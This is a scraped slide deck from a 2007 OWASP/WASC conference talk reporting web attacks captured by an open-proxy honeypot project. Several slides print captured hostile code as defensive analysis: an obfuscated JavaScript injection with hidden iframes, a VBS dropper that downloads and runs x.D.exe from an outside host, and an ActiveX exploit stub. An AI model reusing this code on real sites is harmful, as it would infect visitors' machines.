Скачать презентацию WASC Distributed Open Proxy Honeypot Project Phase 2 Скачать презентацию WASC Distributed Open Proxy Honeypot Project Phase 2

ae56c32716b35ecb8e36d80d037f72f4.ppt

  • Количество слайдов: 62

WASC Distributed Open Proxy Honeypot Project: Phase 2 Update on Attacks and Vulnerabilities OWASP WASC Distributed Open Proxy Honeypot Project: Phase 2 Update on Attacks and Vulnerabilities OWASP & WASC App. Sec 2007 Conference San Jose – Nov 2007 http: //www. webappsec. org/ Ryan Barnett, WASC Officer Director of Application Security Training, Breach Security Ryan. [email protected] com Copyright © 2007 - The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the Creative Commons Attribution-Share. Alike 2. 5 License. To view this license, visit http: //creativecommons. org/licenses/by-sa/2. 5/ The OWASP Foundation http: //www. owasp. org/

Introduction Ryan Barnett § Director of Application Security Training at Breach Security. § Background Introduction Ryan Barnett § Director of Application Security Training at Breach Security. § Background as web server administrator. § Author of Preventing Web Attacks with Apache (Addison/Wesley, 2006). § Open Source and Community projects: 4 Board Member, Web Application Security Consortium. 4 Project Leader, WASC Distributed Open Proxy Honeypot Project. 4 Community Manager, Mod. Security. 4 Instructor for the SANS Institute. 4 Project Leader, Center for Internet Security’s Apache Benchmark. OWASP & WASC App. Sec 2007 Conference – San Jose – Nov 2007

Distributed Open Proxy Honeypot Project < Problem – Lack of “real” web attack log Distributed Open Proxy Honeypot Project < Problem – Lack of “real” web attack log data. < Goal – To identify/block/report on current web attacks. < Method – Instead of functioning as the “target” of web attacks, we instead run as a conduit for the attacks by running as an open proxy server. < Tools Used – Mod. Security 2. x, Core Rules and the Mod. Security Management Appliance. http: //www. webappsec. org/projects/honeypots OWASP & WASC App. Sec 2007 Conference – San Jose – Nov 2007

Why an Open Proxy? < There is a lack of perceived “value” in just Why an Open Proxy? < There is a lack of perceived “value” in just deploying a default apache install. 4 We will most likely only get hit by worms and automated programs scanning IP addresses. < Bad guys use them 4 We know that the bad guys use open proxies to loop their attacks through to hide their source IP. < We need to function as a real open proxy and only block known malicious attacks. 4 Bad guys will test our systems prior to using them for their attacks. 4 If we don’t work as a real open proxy, they will identify this from the initial probe and then not use our systems. OWASP & WASC App. Sec 2007 Conference – San Jose – Nov 2007

Typical Initial Testing OWASP & WASC App. Sec 2007 Conference – San Jose – Typical Initial Testing OWASP & WASC App. Sec 2007 Conference – San Jose – Nov 2007

What are we reporting? <We are presenting real, live web attack data captured “in-the-wild” What are we reporting?

Why are we reporting this data? <To raise public awareness about real attacks <To Why are we reporting this data?

Phase 1: Active Project Sensors <We had a total of 7 active sensor participants Phase 1: Active Project Sensors

Phase 2: New Active Sensors <After Phase 1 ended (May 2007), we had several Phase 2: New Active Sensors

Active Contributors < Ivan Ristic < Brian Rectanus < Ofer Shezaf < Robert Auger Active Contributors < Ivan Ristic < Brian Rectanus < Ofer Shezaf < Robert Auger < Sergey Gordeychik < Spiros Antonatos < Bjoern Weiland < Kurt Grutzmacher < Pete Le. May < Rick Nall < Jeremiah Grossman < Peter Guerra < Jehiah Czebotar < Shaun Vlassis < Román Medina-Heigl Hernández < Peednas Dhamija < Erwin Geirnaert < Sebastian Garcia < Bogdan Calin OWASP & WASC App. Sec 2007 Conference – San Jose – Nov 2007

Project Architecture OWASP & WASC App. Sec 2007 Conference – San Jose – Nov Project Architecture OWASP & WASC App. Sec 2007 Conference – San Jose – Nov 2007

Central Console Dashboard OWASP & WASC App. Sec 2007 Conference – San Jose – Central Console Dashboard OWASP & WASC App. Sec 2007 Conference – San Jose – Nov 2007

Management Console – Alert Viewer OWASP & WASC App. Sec 2007 Conference – San Management Console – Alert Viewer OWASP & WASC App. Sec 2007 Conference – San Jose – Nov 2007

Management Console – Transaction Search OWASP & WASC App. Sec 2007 Conference – San Management Console – Transaction Search OWASP & WASC App. Sec 2007 Conference – San Jose – Nov 2007

Additional Custom Honeypot Rules <Deny known offenders 4 Run an RBL check and block Additional Custom Honeypot Rules

Mod. Security Audit Logging and Traffic Categorization < All honeypot traffic falls in one Mod. Security Audit Logging and Traffic Categorization < All honeypot traffic falls in one of three categories: 4 Normal - Web surfing 4 Abnormal but not malicious - Odd protocol manipulation by poorly written client/spiders, load balancing by Web servers and proprietary applications 4 Malicious - Recon, intrusion attempts and worms < We are logging all transactions. 4 Not just those that trigger a rule 4 How else can we identify new attacks or successful evasions? < The majority of traffic (~3/4) did not trigger a Mod. Security rule. 4 What was this traffic? 4 Was it an attack? 4 Was it benign? < As we move forward in phase 2, we will be focusing more on this type of data analysis. OWASP & WASC App. Sec 2007 Conference – San Jose – Nov 2007

High-Level Statistics – October 2007 < Total number of transactions – 8, 988, 361 High-Level Statistics – October 2007 < Total number of transactions – 8, 988, 361 4 Number of individual transaction entries that we received < Total number of alerts – 2, 133, 677 4 Number of individual alerts that triggered from one of our protection rulesets < Total unique clients – 46, 513 4 Number of remote IP addresses that directly connected to our honeypots < Total number of clients looping through other proxy servers – 61, 846 4 Number of unique IP addresses that were identified in x. Forwarded-For request headers < Total unique targets – 171, 688 4 Number of destination websites OWASP & WASC App. Sec 2007 Conference – San Jose – Nov 2007

Top Trends < Banner-Ad/Click Fraud generated the most traffic 4 ~2, 625, 522 Requests Top Trends < Banner-Ad/Click Fraud generated the most traffic 4 ~2, 625, 522 Requests (click, banner and ad words in URL) < SPAMMERS are the #2 users of open proxy servers 4 HTTP CONNECT Method Requests to have the proxy connect directly to remote SMTP hosts 4 Automated programs to post their SPAM messages to user Forums, etc… < The majority of web attacks are automated 4 This increases the need for anti-automation defenses < Information leakage is a huge problem 4 Too many websites are configured to provide verbose error messages to clients < Attackers are looking for easy targets 4 Pick a vulnerability -> Find a site 4 Instead of Pick a site -> Find a Vulnerability < Attackers are utilizing Proxy Chaining 4 This makes source tracebacks extremely difficult OWASP & WASC App. Sec 2007 Conference – San Jose – Nov 2007

Top 5 Mod. Security Attack Categories OWASP & WASC App. Sec 2007 Conference – Top 5 Mod. Security Attack Categories OWASP & WASC App. Sec 2007 Conference – San Jose – Nov 2007

Top Attacks Identified by the Honeypot Rules Rule Message Data < < < < Top Attacks Identified by the Honeypot Rules Rule Message Data < < < < < < Request Missing a Host Header CONNECT Request Missing a User Agent Header Request Missing an Accept Header Host header is a numeric IP address UTF 8 Encoding Abuse Attack Attempt Client Denied by RBL Check Client Denied Due to Excessive Basic Authentication Failures Request Indicates an automated program explored the site URL Encoding Abuse Attack Attempt SQL Injection Attack. Google robot activity example robot activity IIS Information Leakage HTTP Response Splitting Attack. Matched signature <%0 d> SQL Information Leakage URL file extension is restricted by policy Visa Credit Card Number sent from site to user Request Indicates a Security Scanner Scanned the Site PHP source code leakage Request Body Parsing Failed. Multipart: Final boundary missing. Cross-site Scripting (XSS) Attack. System Command Injection. (# of Requests) (575, 928) (415, 103) (277, 566) (130, 314) (93, 579) (11, 275) (3, 184) (2, 792) (2, 613) (530) (499) (404) (345) (343) (282) (264) (241) (109) (107) (99) (94) (90) OWASP & WASC App. Sec 2007 Conference – San Jose – Nov 2007

WASC Web Security Threat Classification: Attacks and Vulnerabilities Identified 1 Authentication 1. 1 Brute WASC Web Security Threat Classification: Attacks and Vulnerabilities Identified 1 Authentication 1. 1 Brute Force 1. 2 Insufficient Authentication 1. 3 Credential/Session Prediction 2 Authorization 2. 1 Insufficient Authorization 2. 2 Insufficient Session Expiration 2. 3 Session Fixation 3 Client-side Attacks 3. 1 Content Spoofing 3. 2 Cross-site Scripting/Malicious Code Injection 4 Command Execution 4. 5 SQL Injection 5 Information Disclosure 5. 2 Information Leakage 6 Logical Attacks 5. 2 Insufficient Anti. Automation OWASP & WASC App. Sec 2007 Conference – San Jose – Nov 2007

Brute Force Attack A Brute Force attack is an automated process of trial and Brute Force Attack A Brute Force attack is an automated process of trial and error used to guess a person's username, password, creditcard number or cryptographic key. We will discuss the following attacks: 4 HEAD Method Scanning § Brute Forcing Porn Sites 4 GET Method Logins Scanning § Distributed Reverse Brute Force Scans against example OWASP & WASC App. Sec 2007 Conference – San Jose – Nov 2007

HEAD Request Method Scanning < Request is using HEAD to increase the speed of HEAD Request Method Scanning < Request is using HEAD to increase the speed of responses (as the web server does not have to send back the response body) < The request includes the Authorization header with the base 64 encoded credentials < Goal is to look for an HTTP Response Status Code of something other than 401 (most often a 200 or 302) OWASP & WASC App. Sec 2007 Conference – San Jose – Nov 2007

GET Method Logins < This authentication method passes user credentials on the URL line GET Method Logins < This authentication method passes user credentials on the URL line as arguments instead of using Authorization or Cookie headers < This type of authentication is considered not as secure as the login data can be easily captured in standard log file formats (thus increasing disclosure) < Reverse Brute Force Scan 4 The attacker is cycling through different usernames and then repeating the same target password of “james” GET GET GET http: //www. example. com/login? . patner =sbc&login=mc_check&passwd=james&. save=1 HTTP/1. 0 http: //www. example 2. com/login? . patner= sbc&login=mcgolden&passwd=james&. save=1 HTTP/1. 0 http: //www. example 3. com/login? . patner= sbc&login=mc_bob&passwd=james&. save=1 HTTP/1. 0 http: //www. example 4. com/login? . patner= sbc&login=mc_bill&passwd=james&. save=1 HTTP/1. 0 http: //www. example 5. com/login? . patner= sbc&login=mcnumber&passwd=james&. save=1 HTTP/1. 0 http: //www. example 6. com/login? . patner= sbc&login=mc_energy&passwd=james&. save=1 HTTP/1. 0 OWASP & WASC App. Sec 2007 Conference – San Jose – Nov 2007

Distributed Scanning < The attacker is distributing the scan across multiple example domains < Distributed Scanning < The attacker is distributing the scan across multiple example domains < This many help to reduce the likelihood of identification of the attacks and/or may not cause account lockouts GET GET GET http: //www. example. com/login? . patner=sbc&login=mc_check&passwd=james&. save=1 HTTP/1. 0 http: //www. example 2. comlogin? . patner=sbc&login=mcgolden&passwd=james&. save=1 HTTP/1. 0 http: //www. example 3. comlogin? . patner=sbc&login=mc_bob&passwd=james&. save=1 HTTP/1. 0 http: //www. example 4. com/login? . patner=sbc&login=mc_bill&passwd=james&. save=1 HTTP/1. 0 http: //www. example 5. com/login? . patner=sbc&login=mcnumber&passwd=james&. save=1 HTTP/1. 0 http: //www. example 6. com/login? . patner=sbc&login=mc_energy&passwd=james&. save=1 HTTP/1. 0 OWASP & WASC App. Sec 2007 Conference – San Jose – Nov 2007

Identifying Correct Credentials <Failed Authentication 4 Produces a 200 Status Code 4 HTML Text Identifying Correct Credentials

Distributed Scanning Part 2 < Same distributed reverse scanning concept. < They are targeting Distributed Scanning Part 2 < Same distributed reverse scanning concept. < They are targeting a different authentication application. 4 In this example using the “verify_user” application 4 The response data is easier to parse (next slide) GET GET http: //xxx. 238/verify_user? l=kevinduffy 99&p=mischa HTTP/1. 0 http: //xxx. 34/verify_user? l=keziboy&p=mischa HTTP/1. 0 http: //xxx. 85/verify_user? l=dowfla&p=mischa HTTP/1. 0 http: //xxx. 114/verify_user? l=nomofoyo 13&p=mischa HTTP/1. 0 http: //xxx. 223/verify_user? l=corruptu_2000&p=mischa HTTP/1. 0 http: //xxx. 28/verify_user? l=krdewey 01&p=mischa HTTP/1. 0 http: //xxx. 114/verify_user? l=nomofoyo 13&p=mischa HTTP/1. 0 OWASP & WASC App. Sec 2007 Conference – San Jose – Nov 2007

Account Enumeration < SPAMMERs can use this technique to enumerate valid example accounts 4 Account Enumeration < SPAMMERs can use this technique to enumerate valid example accounts 4 To send SPAM to 4 To try and hijack accounts < Failed Username 4 ERROR: 102: Invalid Login < Failed Password 4 ERROR: 101: Invalid Password < Correct Authentication 4 OK: 0: username < Attackers successfully enumerated 2 accounts 4 OK: 0: skaterman 6 4 OK: 0: [email protected] net OWASP & WASC App. Sec 2007 Conference – San Jose – Nov 2007

Insufficient Authentication occurs when a web site permits an attacker to access sensitive content Insufficient Authentication occurs when a web site permits an attacker to access sensitive content or functionality without having to properly authenticate. Example: accessing an “admin” function by passing the username in the URL. Clients do not need to login or submit authorization cookies GET http: //www. example. com/english/book/ book. php? page=781&block=776&admin=0 HTTP/1. 0 --CUT-- OWASP & WASC App. Sec 2007 Conference – San Jose – Nov 2007

Credential/Session Prediction is a method of hijacking or impersonating a web site user. Common Credential/Session Prediction is a method of hijacking or impersonating a web site user. Common attack sequence is: 1. Attacker connects to the web application acquiring the current session ID 2. Attacker calculates or Brute Forces the next session ID 3. Attacker switches the current value in the cookie/hidden form- field/URL and assumes the identity of the next user OWASP & WASC App. Sec 2007 Conference – San Jose – Nov 2007

No Encryption/Clear-Text Cookie Data < These are examples of session/cookie data sent from applications No Encryption/Clear-Text Cookie Data < These are examples of session/cookie data sent from applications to clients < Since there is no encryption or hashing of data, attackers can easily alter the data (such as incrementing/decrementing the digits) to attempt to take over another users session Set-Cookie: guest. ID=413; Set-Cookie: Current. Session. Cookie=212035755652; Set-Cookie: CFID=3937042; expires=Thu, Set-Cookie: Referer=/gate/gb/www. example. com/; Path=/ Set-Cookie: mg. User=1|76 ab 0352 df 45407 e 8033 a 4 faf 5 d 7 b 0 be| 64. 5. 128. 103|1192250622159|1; Domain=. example. com; Expires=Mon, 12 -Nov-2007 04 OWASP & WASC App. Sec 2007 Conference – San Jose – Nov 2007

Insufficient Entropy <These cookie values are not random enough to prevent guessing attacks <The Insufficient Entropy

Insufficient Encryption < Unfortunately, sensitive data is often passed within the cookie header data Insufficient Encryption < Unfortunately, sensitive data is often passed within the cookie header data and it is not sufficiently protected with strong encryption < Fake or weak protection is often used, such as Base 64 Encoding 4 Set-Cookie: cpg 132_data=YToz. Ontz. Oj. I 6 Ikl. EIjtz. Oj. My. Oi. I 0 YTA 4 YT Qw. Nj. Ni. Zj. M 2 ZTc 2 Nj. Aw. Mj. E 2 NDRk. MDE 3 Njdj. Zi. I 7 czoy. Oi. Jh b. SI 7 a. Tox. O 3 M 6 NDoibm. Ft. ZSI 7 czo 0 Oi. JBbm 9 u. Ijt 9 4 Set-Cookie: cpg 132_data=a: 3: {s: 2: "ID"; s: 32: "4 a 08 a 4063 bf 36 e 7660021644 d 01767 cf"; s: 2: "am"; i: 1; s: 4: "name"; s: 4: "Anon"; } OWASP & WASC App. Sec 2007 Conference – San Jose – Nov 2007

Insufficient Authorization is when a web site permits access to sensitive content or functionality Insufficient Authorization is when a web site permits access to sensitive content or functionality that should require increased access control restrictions. < Cookie in previous example contained a valid sessionid hash and then a username, however poorly written applications often do not make a connection between the valid sessionid and the username < What happens if an attacker alters portions of the cookie value and changes the username? 4 Set-Cookie: cpg 132_data=a: 3: {s: 2: "ID"; s: 32: "4 a 08 a 4063 bf 36 e 76 60021644 d 01767 cf"; s: 2: "am"; i: 1; s: 4: "name"; s: 5: "A dmin"; } OWASP & WASC App. Sec 2007 Conference – San Jose – Nov 2007

Insufficient Authorization: Web Defacements HTTP PUT method --6 aa 02 c 14 -B-PUT http: Insufficient Authorization: Web Defacements HTTP PUT method --6 aa 02 c 14 -B-PUT http: //www. example. com/scorpion. txt HTTP/1. 0 Accept-Language: pt-br, en-us; q=0. 5 Translate: f Content-Length: 36 User-Agent: Microsoft Data Access Internet Publishing Provider DAV 1. 1 Host: www. example. com Pragma: no -cache --6 aa 02 c 14 -C-1923 Turk Cyberscorpio. N ownz your box OWASP & WASC App. Sec 2007 Conference – San Jose – Nov 2007

Insufficient Session Expiration is when a web site permits an attacker to reuse old Insufficient Session Expiration is when a web site permits an attacker to reuse old session credentials or session IDs for authorization. < No expiration date/time specified Set-Cookie: phpbb 2 mysql_sid=9 ff 3 b 118 fbbf 63 e 088 c 99 d 09 d 810 e 311; path=/; domain=d M Y, G. i < Expiration date/time is too long Set-Cookie: cpvr=3 cc 2 d 13 f-1 b 27 -4 c 11 -a 277 -b 3 cb 77 bf 33 e 3; domain=example. com; expires=Sun, 16 -Jan-2107 12: 27: 36 GMT; path=/ OWASP & WASC App. Sec 2007 Conference – San Jose – Nov 2007

Insufficient Session Expiration Continued < It is also important to note that proper session Insufficient Session Expiration Continued < It is also important to note that proper session expiration means expiring, invalidating or deleting the sessionid in BOTH the web browser and the web application < Poorly written web applications only attempt to expire or delete the cookie from the web browser 4 Set-Cookie: T=z=0; expires=Thu, 01 Jan 1970 22: 00 GMT; path=/; domain=. example. com < Remember – you do not own the browser! < These cookies can potentially be sent back to the web application < Will they let the user back in? ? ? OWASP & WASC App. Sec 2007 Conference – San Jose – Nov 2007

Other Cookie Issues < Minimal use of “HTTPOnly” and “Secure” Cookie protections < Httponly Other Cookie Issues < Minimal use of “HTTPOnly” and “Secure” Cookie protections < Httponly helps to prevent cookies from being read by client-side scripting Set-Cookie: ASP. NET_Session. Id=prqc 4 d 2 slpwo 3 c 45 yixtbo 55; path=/; Http. Only < Secure will ensure that the cookie is only sent to an SSL-enabled site Set-Cookie: phpbb 2 mysql_data=a%3 A 0%3 A%7 B%7 D; expires=Wed, 16 -Jan-2008 19: 57 GMT; path=/; secure OWASP & WASC App. Sec 2007 Conference – San Jose – Nov 2007

Session Fixation is an attack technique that forces a user's session ID to an Session Fixation is an attack technique that forces a user's session ID to an explicit value. < While we did not see direct evidence of Session Fixation, we did see web applications that allowed sessionid information to be passed on the URL, which makes a session fixation attack easier to execute by including these web links within emails sent to target victims: POST http: //www. example. com/join. Submit. Action. do; jsessionid=DF 4 B 9604 ED 1467 DFECD 4 BDA 7452 E 23 D 9 HTTP/1. 1 POST http: //www. example. com/account/login. php; sessionid=6 d 0 e 2 a 51 c 515 cb 5 b 877 bae 03972 a 0 a 78 HTTP/1. 1 OWASP & WASC App. Sec 2007 Conference – San Jose – Nov 2007

Content Spoofing is an attack technique used to trick a user into believing that Content Spoofing is an attack technique used to trick a user into believing that certain content appearing on a web site is legitimate and not from an external source. < We ran into an interesting Blog defacement < It uses Javascript in the following manner 4 Opens an alert box 4 Opens a document. window to displays an alternative page from a remote site OWASP & WASC App. Sec 2007 Conference – San Jose – Nov 2007 </p> </div> <div style="width: auto;" class="description columns twelve"><p><img class="imgdescription" title="Javascript Defacement OWASP & WASC App. Sec 2007 Conference – San Jose – Nov" src="https://present5.com/presentation/ae56c32716b35ecb8e36d80d037f72f4/image-41.jpg" alt="Javascript Defacement OWASP & WASC App. Sec 2007 Conference – San Jose – Nov" /> Javascript Defacement OWASP & WASC App. Sec 2007 Conference – San Jose – Nov 2007 </p> </div> <div style="width: auto;" class="description columns twelve"><p><img class="imgdescription" title="Additional Obfuscated Javascript: Injected at the bottom of the page <Script Language='Javascript'> <!-document. write(unescape('%3" src="https://present5.com/presentation/ae56c32716b35ecb8e36d80d037f72f4/image-42.jpg" alt="Additional Obfuscated Javascript: Injected at the bottom of the page <Script Language='Javascript'> <!-document. write(unescape('%3" /> Additional Obfuscated Javascript: Injected at the bottom of the page <Script Language='Javascript'> <!-document. write(unescape('%3 C%73%63%72%69%70%74%3 E%0 D%0 A%3 C%21%2 D %2 D%0 D%0 A%64%6 F%63%75%6 D%65%6 E%74%2 E%77%72%69%74%65%28 %75%6 E%65%73%63%61%70%65%28%22%25%33%43%73%63%72%69%70 %74%25%33%45%25%30%44%25%30%41%25%33%43%25%32%31%2 D%2 D %25%30%44%25%30%41%64%6 F%63%75%6 D%2 D%25%32%35%30%44%25 %32%35%30%41%64%6 F%63%75%6 D%65%6 E%74%2 E%77%72%69%74%65 %25%32%38%75%6 E%65%73%63%61%70%65%25%32%38 %25%32%35%32% --CUT— %35%30%41%25%32%35%33%43%2 F%73%63%72%69%70%74%25 %32%35%33%45%25%32%32%25%32%39%25%32 %35%32%39%25%32%35%33%42%25%32%35%30%44%25%32%35%30%41 %2 F%2 F%2 D%2 D%25%32%35%33%45%25%32%35%30%44%25%32%35%30 %41%25%32%35%33%43%2 F%73%63%72%69%70%74%25%32%35%33%45 %25%32%32%25%32%39%25%33%42%25%30%44%25%30%41 %2 F%2 F%2 D%2 D%25%33%45%25%30%44%25%30%41%25%33%43%2 F%73 %63%72%69%70%74%25%33%45%22%29%29%3 B%0 D%0 A%2 F%2 F%2 D%2 D %3 E%0 D%0 A%3 C%2 F%73%63%72%69%70%74%3 E')); //--> </Script> OWASP & WASC App. Sec 2007 Conference – San Jose – Nov 2007 </p> </div> <div style="width: auto;" class="description columns twelve"><p><img class="imgdescription" title="URL Decoded Javascript <!-document. write(unescape('<script> <!-document. write(unescape("<script> <!-document. write(unescape("<iframe width="0" height="0" src="http: //royy. byethost" src="https://present5.com/presentation/ae56c32716b35ecb8e36d80d037f72f4/image-43.jpg" alt="URL Decoded Javascript <!-document. write(unescape('<script> <!-document. write(unescape("<script> <!-document. write(unescape("<iframe width="0" height="0" src="http: //royy. byethost" /> URL Decoded Javascript <!-document. write(unescape('<script> <!-document. write(unescape("<script> <!-document. write(unescape("<iframe width="0" height="0" src="http: //royy. byethost 7. com/url. htm" scrolling="no" frameborder="0"></iframe> <iframe width="0" height="0" src="bicho. wml" scrolling="no" frameborder="0"></iframe> <iframe width="0" height="0" src="bicho. htm" scrolling="no" frameborder="0"></iframe> <iframe width="0" height="0" src="embed. htm" scrolling="no" frameborder="0"></iframe>")); //--> </script>")); //--> </script>')); //--> OWASP & WASC App. Sec 2007 Conference – San Jose – Nov 2007 </p> </div> <div style="width: auto;" class="description columns twelve"><p><img class="imgdescription" title="bicho. htm – Attempted VBS Malware Install tf = fso. Create. Text. File(c. System." src="https://present5.com/presentation/ae56c32716b35ecb8e36d80d037f72f4/image-44.jpg" alt="bicho. htm – Attempted VBS Malware Install tf = fso. Create. Text. File(c. System." /> bicho. htm – Attempted VBS Malware Install tf = fso. Create. Text. File(c. System. Dir + "runit. vbs", true); //tf = fso. Create. Text. File("c: \runit. vbs", true); tf. Write. Line("On Error Resume Next"); tf. Write. Line("URL = "http: //rzone. com. ar/x. D. exe""); tf. Write. Line("Set xml = Create. Object("Microsoft. XMLHTTP")"); tf. Write. Line("xml. Open "GET", URL, False"); tf. Write. Line("xml. Send"); tf. Write. Line("set o. Stream = createobject("Adodb. Stream")"); tf. Write. Line("o. Stream. type = 1"); tf. Write. Line("o. Stream. open"); tf. Write. Line("o. Stream. write xml. response. Body"); tf. Write. Line("o. Stream. savetofile "" + c. System. Dir + "x. D. exe", 1"); tf. Write. Line("o. Stream. close"); tf. Write. Line("set o. Stream = nothing"); tf. Write. Line("Set xml = Nothing"); tf. Write. Line("Set o. Shell = createobject("WScript. Shell")"); tf. Write. Line("o. Shell. run "" + c. System. Dir + "x. D. exe", 1, false"); tf. Close(); obj. Shell. run(""" + c. System. Dir + "runit. vbs""); OWASP & WASC App. Sec 2007 Conference – San Jose – Nov 2007 </p> </div> <div style="width: auto;" class="description columns twelve"><p><img class="imgdescription" title="Embed. htm – Attempted Active. X Malware Install <object name="x" classid="clsid: 12345678 -1234 -123456789012"" src="https://present5.com/presentation/ae56c32716b35ecb8e36d80d037f72f4/image-45.jpg" alt="Embed. htm – Attempted Active. X Malware Install <object name="x" classid="clsid: 12345678 -1234 -123456789012"" /> Embed. htm – Attempted Active. X Malware Install <object name="x" classid="clsid: 12345678 -1234 -123456789012" codebase="mhtml: file: //C: NO_SUCH_MHT. MHT !http: //www. rzone. com. ar/x. D. exe"> OWASP & WASC App. Sec 2007 Conference – San Jose – Nov 2007 </p> </div> <div style="width: auto;" class="description columns twelve"><p><img class="imgdescription" title="More Javascript Malware Injections: A Serious Problem… <There are many websites that are injecting" src="https://present5.com/presentation/ae56c32716b35ecb8e36d80d037f72f4/image-46.jpg" alt="More Javascript Malware Injections: A Serious Problem… <There are many websites that are injecting" /> More Javascript Malware Injections: A Serious Problem… <There are many websites that are injecting malicious javascript into legitimate webpages. <The javascript may be injected either by remote attackers or by the website owner themselves. <Beware of what site you visit. <Recommend using “sandboxed” browsers as throw-away sessions. 4 VMware images 4 Applications such as Sandboxie http: //www. sandboxie. com/ OWASP & WASC App. Sec 2007 Conference – San Jose – Nov 2007 </p> </div> <div style="width: auto;" class="description columns twelve"><p><img class="imgdescription" title="Honeypot Example: Client visits Proxy. Checker site POST http: //www. example. com/boyter/Check. Proxy. php" src="https://present5.com/presentation/ae56c32716b35ecb8e36d80d037f72f4/image-47.jpg" alt="Honeypot Example: Client visits Proxy. Checker site POST http: //www. example. com/boyter/Check. Proxy. php" /> Honeypot Example: Client visits Proxy. Checker site POST http: //www. example. com/boyter/Check. Proxy. php HTTP/1. 0 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */* Accept-Language: en Accept-Encoding: gzip, deflate User-Agent: Mozilla/4. 0 (compatible; MSIE 6. 0; Windows NT 5. 1) Content-Type: application/x-www-form-urlencoded Host: www. example. com Content-Length: 21 seed=9 D 3 BFF 73 E 33871 B 5 OWASP & WASC App. Sec 2007 Conference – San Jose – Nov 2007 </p> </div> <div style="width: auto;" class="description columns twelve"><p><img class="imgdescription" title="Proxy. Checker Response HTTP/1. 1 200 OK Notice: Subject to Monitoring X-Powered-By: PHP/5. 2." src="https://present5.com/presentation/ae56c32716b35ecb8e36d80d037f72f4/image-48.jpg" alt="Proxy. Checker Response HTTP/1. 1 200 OK Notice: Subject to Monitoring X-Powered-By: PHP/5. 2." /> Proxy. Checker Response HTTP/1. 1 200 OK Notice: Subject to Monitoring X-Powered-By: PHP/5. 2. 0 Content-Type: text/html Via: 1. 0 debian. localdomain Content-Length: 4080 Connection: close Hmm… looks like there should be moe data? ? ? hash=9 D 3 BFF 73 E 33871 B 5 REMOTE_ADDR=70. 187. 221. 243 HTTP_VIA=1. 0 debian. localdomain HTTP_X_FORWARDED_FOR= OWASP & WASC App. Sec 2007 Conference – San Jose – Nov 2007 </p> </div> <div style="width: auto;" class="description columns twelve"><p><img class="imgdescription" title="Here Comes the Javascript! <!--[O]-><script>document. write(unescape("%3 Cscript%3 Etry%20%7 Bvar%20 zl%3 D%27 KKu. K 7" src="https://present5.com/presentation/ae56c32716b35ecb8e36d80d037f72f4/image-49.jpg" alt="Here Comes the Javascript! <!--[O]-><script>document. write(unescape("%3 Cscript%3 Etry%20%7 Bvar%20 zl%3 D%27 KKu. K 7" /> Here Comes the Javascript! <!--[O]-><script>document. write(unescape("%3 Cscript%3 Etry%20%7 Bvar%20 zl%3 D%27 KKu. K 7 u. KNu. KUu. Kdu. Kwu. Keu. Ki u. KHu. KMu. Kzu. Kau. Kcu. KVu. KWu. Knu. KGu. Kbu. Kgu. Klu. K 6 u. Ksu. KOu. KTu. Kpu. Kru. Kku. K 4 u. Kxu. KDu. K 5 u. KJu. K 8 u. Kju. KIu. K 3 u. Khu. K mu. Kfu. KSu. Kou. KPu. KBu. KLu. KZu. Kqu. Kyu. KXu. KRu. Ktu. K 9 u. KCu. KYu. KFu 7 Ku 77 u 7 Nu 7 Uu 7 du 7 wu 7 eu 7 iu 7 Hu 7 Mu 7 zu 7 au 7 cu 7 Vu 7 Wu 7 nu 7 Gu 7 bu 7 gu 7 lu 76 u 7 su 7 O%27%3 Bvar%20 ai%3 DString%28%27 u%27%29%2 CPT%3 DArray%288340 %5 E 8245%2 C 9103%5 E 9057%2 CKS%28%27254%27%29%2 CKS%28%27239%27%29%2 C 14855%5 E 15091%2 CKS%28%27237%27%29%2 C 28266%5 E 28291%2 CKS%28%27163%27%29%2 C 30960%5 E 30731%2 C 5993%5 E 6017%2 C 21960%5 E 21819%2 CKS%28%27242%27%29%2 CKS%28%27189%27%29%2 C 32203%5 E 32051%2 C 1 5056%5 E 14901%2 CKS%28%27181%27%29%2 CKS%28%27214%27%29%2 CKS%28%27218%27%29%2 CKS %28%27228%27%29%2 C 18460%5 E 18605%2 C 3478%5 E 3399%2 CKS%28%27215%27%29%2 CKS%28%27180 %27%29%2 CKS%28%27230%27%29%2 C 26866%5 E 26649%2 C 8641%5 E 8509%2 CKS%28%27249%27%29%2 C 3779%5 E 3683%2 CKS%28%27234%27%29%2 C 29950%5 E 29735%2 C 6373%5 E 6175%2 C 27055%5 E 26889%2 C 10830%5 E 11005%2 CKS%28%27201%27%29%2 C 10553%5 E 10697%2 C 21401%5 E 21295%2 CKS%28%27165%2 7%29%2 CKS%28%27171%27%29%2 C 32204%5 E 32101%2 CKS%28%27173%27%29%2 CKS%28%27246%27% 29%2 C 32516%5 E 32699%2 CKS%28%27208% --CUT-Ka. KNKMKIKVKz. Ke. K 8 KNKUKVKr. Ke. KV 7 VKYKVKIKVKz. Ke. Kn. KRKd. KHKUKr. KIKVKRKOKJ 7 c. KGKLK 8 K 7 KVKe. Ky. Ke. KUKd 7 WKMKe. KVKn. KRK 7 KUKNKRKl. KWKMKo. KOKJ 7 c. KGKLK 8 KHKUKr. KIKV 7 n. Ka. KUKk. KVKUK 4 KSKJKc 7 c. KGKLK 8 Kx. Kd. Kk. Ke. KF K 4 Kt. KJ 7 c. KGKLK 8 KFKVKd. K 5 KFKe. K 4 Kt. KJKe. KUKg. Kc. KTKc. Kk. Ka. KNKMKIKVKz. Ke. K 87 WKa. Kk. Kg. K 8 Kr. Kw. KVKz. Kk. KXKFKd KYKk. Kn 7 c. KGKLKOKJKVKw. KWKn. Kq. Ky. KXKl. KGKCKs. KOKJKc. KZKNKr. Ke. KNKFKn. KVKOKTKc. Kk. Ka. KNKMKIKVKz. Ke. K 8 Kx. KU Kd. Ke. KVKn. KRKKKFKe. KIKYKi. KK 7 WKa. Kk. Kg. Ki. KK 7 KKFKe. KIKYKi. KRKOKJKk. Ka. KNKMKIKVKz. Ke. K 87 WKa Kk. Kg. K 8 Kr. Kw. KVKz. Kk. KXKFKd. KYKk. Kn 7 c. KGKLKOKJKc. KVKw. KWKn. Kq. Ky. KXKl. KGKCKs. KOKJKc. KZ 7 GKHKMKz. KNKe Kd. Ka. Kz. Kc 77 Kq 7 e. Kn. KOKTKc. Kp. Kr. KUKc. Kb. Kj. Kp. K 47 b. Kf. KJKp. Kr. KUKc. K 5 Kz 7 g. K 4 KPKSKt 7 b 7 l. Kf 76 Km 7 s. Kh 7 MKSKr 7 WKNKk KVKHKPKl. Kg. KY 7 VK 4 KPKPKJKc. 